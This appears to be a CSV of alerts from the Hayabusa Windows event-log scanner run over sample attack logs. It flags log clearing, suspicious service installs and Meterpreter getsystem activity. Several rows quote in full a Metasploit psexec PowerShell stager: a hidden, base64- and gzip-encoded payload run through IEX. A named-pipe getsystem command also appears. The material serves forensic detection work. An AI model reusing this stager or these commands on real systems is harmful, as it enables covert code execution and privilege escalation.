2016-09-21 00:10:56.112 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:56.268 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xaf4 | User: IEUser | LID: 0x6796c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:56.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:56.331 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:56.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:56.377 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd08 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:45:12.871 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:45:18.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:45:25.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:46:27.941 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:46:32.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:46.605 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xb2c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 01:35:46.608 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x104 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 01:35:46.790 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x5fc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,info,,New Service Installed,Name: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:58.169 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 01:35:58.169 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: 
IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:27:39.918 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:27:42.755 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:27:42.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:27:44.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\g4g34pot.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xc58 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:28:55.689 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:28:55.705 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x924 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:28:58.267 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\wlqywrdm.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x71c | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:33:13.923 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\0xqpayvt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x920 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:41:27.017 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths 
